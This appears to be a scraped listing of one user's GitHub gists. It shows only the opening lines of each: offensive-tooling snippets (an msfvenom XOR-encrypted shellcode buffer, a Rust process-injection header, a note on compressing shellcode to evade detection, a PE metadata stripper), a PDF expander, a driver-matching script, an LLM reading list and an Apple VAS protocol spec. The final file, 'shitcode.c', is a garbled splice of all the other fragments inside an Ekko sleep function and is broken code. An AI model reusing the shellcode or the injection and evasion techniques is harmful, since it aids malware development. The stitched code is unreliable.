superuser5

## rdp_pack.cpp

/**
    Compression using undocumented API in rdpbase.dll

    RDPCompressEx supports four algorithms : MPPC-8K, MPPC-64K, NCRUSH and XCRUSH.

    This code supports all except NCRUSH.
    The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection.

    NCRUSH compression appears to work but fails for decompression.

## byorwx.cpp
#include <cstdint>

// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe

// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
unsigned char buf[] =
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"

## main.ts
// npm i superagentai-js

import { SuperAgentClient } from "superagentai-js";

const GITHUB_REPO_URL = "https://github.com/homanp/nagato";
const PROMPT = `You are a helpful AI assistant that's an expert at answering questions about the following Github repository: ${GITHUB_REPO_URL}\n\nAlways use the functions provided to answer all questions by the user.`;

interface Agent {
  id: string;
  name: string;

## normcore-llm.md

      
              1 file
            
          
              330 forks
            
          
                67 comments
              
            
              3431 stars
            
          
                veekaybee
                / normcore-llm.md
            
            
              Last active
              October 22, 2025 08:37
            
              
                Normcore LLM Reads
              
          
    Anti-hype LLM reading list

Goals: Add links that are reasonable and good explanations of how stuff works. No hype and no vendor content if possible. Practical first-hand accounts of models in prod eagerly sought.
Foundational Concepts


Pre-Transformer Models


## ExeMask.py
import pefile, struct, sys

if len(sys.argv) != 2:
    print(f"Strip your personal compile info from Exe Files by aaaddress1@chroot.org")
    print(f"Usage: {sys.argv[0]} [path/to/exe]")
    sys.exit(-1)

# Rewrite from pefile: https://github.com/erocarrera/pefile/blob/593d094e35198dad92aaf040bef17eb800c8a373/pefile.py#L3402
def mask_myRichHdr(in_pefile):
    DANS = 0x536E6144  # 'DanS' as dword

## vas.md

      
              1 file
            
          
              3 forks
            
          
                0 comments
              
            
              43 stars
            
          
                gm3197
                / vas.md
            
            
              Last active
              September 26, 2025 22:12
            
              
                Reverse Engineered Value Added Services Protocol Specification
              
          
    Reverse Engineered VAS Protocol Specification


Research by Grayson Martin

Last Updated 7/8/23

Introduction

Value Added Services (VAS) is the protocol used by NFC capable passes in Apple Wallet. Access to this protocol is heavily restricted on both the device end (a special certificate issued by Apple is required to create these passes) and the reader end (NDA enforced confidentiality). As such, a desire arose to better understand the protocol in order to explore additional use cases and examine its cryptographic integrity. There are gaps in understanding in certain parts of this protocol, however this document contains the minimum necessary understanding to automatically select, read data from, and decrypt a pass.
Importantly, this specification does not enable a malicious actor to read the data from a pass for which they do not have both the reader's private key, and the pass type identifier. Imp

  
## RustProcessInjection102.rs
/*
 * Rust basic Process injection using OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread
 * API dynamic resolution and shellcode XOR encoded
 */
#[allow(non_camel_case_types)]
type HANDLE = *mut u64;
#[allow(non_camel_case_types)]
type LPVOID = *mut u64;
#[allow(non_camel_case_types)]
type DWORD = u32;

## pdfExpander.py
pdfcontent = open(r'test.pdf','rb').read()
loc = pdfcontent.index(b"\n2 0 obj\n<<")
loc = pdfcontent.index(b"[", loc)+2
loc2 = pdfcontent.index(b"R", loc)+2
page = pdfcontent[loc:loc2]
print(page)
pdfcontent = pdfcontent[:loc]+(page+b"\n")*4000+pdfcontent[loc2:]
countLoc = pdfcontent.index(b"\n/Count ")
endCountLoc = pdfcontent.index(b"\n",countLoc+1)
pdfcontent = pdfcontent[:countLoc]+pdfcontent[endCountLoc:]

## lolDrivers_FindMatches.ps1
#Requires -Version 5.1
Set-StrictMode -Version 'latest'
$ErrorActionPreference = 'stop'

$DirPathDrivers = @(
    'C:\WINDOWS\inf'
    'C:\WINDOWS\System32\drivers'
    'C:\WINDOWS\System32\DriverStore\FileRepository'
)

## shitcode.c
#include <Core.h>
#include <Win32.h>
#include <Structs.h>
#include <Sleep.h>
#include <Utils.h>

SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)

{

	/**
	Compression using undocumented API in rdpbase.dll

	RDPCompressEx supports four algorithms : MPPC-8K, MPPC-64K, NCRUSH and XCRUSH.

	This code supports all except NCRUSH.
	The MPPC compression ratio is very similar to LZSS, so this could be quite useful for shellcode trying to evade detection.

	NCRUSH compression appears to work but fails for decompression.
	#include <cstdint>

	// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe

	// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
	unsigned char buf[] =
	"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
	"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
	"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
	"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"
	// npm i superagentai-js

	import { SuperAgentClient } from "superagentai-js";

	const GITHUB_REPO_URL = "https://github.com/homanp/nagato";
	const PROMPT = `You are a helpful AI assistant that's an expert at answering questions about the following Github repository: ${GITHUB_REPO_URL}\n\nAlways use the functions provided to answer all questions by the user.`;

	interface Agent {
	id: string;
	name: string;
	import pefile, struct, sys

	if len(sys.argv) != 2:
	print(f"Strip your personal compile info from Exe Files by aaaddress1@chroot.org")
	print(f"Usage: {sys.argv[0]} [path/to/exe]")
	sys.exit(-1)

	# Rewrite from pefile: https://github.com/erocarrera/pefile/blob/593d094e35198dad92aaf040bef17eb800c8a373/pefile.py#L3402
	def mask_myRichHdr(in_pefile):
	DANS = 0x536E6144 # 'DanS' as dword
	/*
	* Rust basic Process injection using OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread
	* API dynamic resolution and shellcode XOR encoded
	*/
	#[allow(non_camel_case_types)]
	type HANDLE = *mut u64;
	#[allow(non_camel_case_types)]
	type LPVOID = *mut u64;
	#[allow(non_camel_case_types)]
	type DWORD = u32;
	pdfcontent = open(r'test.pdf','rb').read()
	loc = pdfcontent.index(b"\n2 0 obj\n<<")
	loc = pdfcontent.index(b"[", loc)+2
	loc2 = pdfcontent.index(b"R", loc)+2
	page = pdfcontent[loc:loc2]
	print(page)
	pdfcontent = pdfcontent[:loc]+(page+b"\n")*4000+pdfcontent[loc2:]
	countLoc = pdfcontent.index(b"\n/Count ")
	endCountLoc = pdfcontent.index(b"\n",countLoc+1)
	pdfcontent = pdfcontent[:countLoc]+pdfcontent[endCountLoc:]
	#Requires -Version 5.1
	Set-StrictMode -Version 'latest'
	$ErrorActionPreference = 'stop'

	$DirPathDrivers = @(
	'C:\WINDOWS\inf'
	'C:\WINDOWS\System32\drivers'
	'C:\WINDOWS\System32\DriverStore\FileRepository'
	)
	#include <Core.h>
	#include <Win32.h>
	#include <Structs.h>
	#include <Sleep.h>
	#include <Utils.h>

	SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)

	{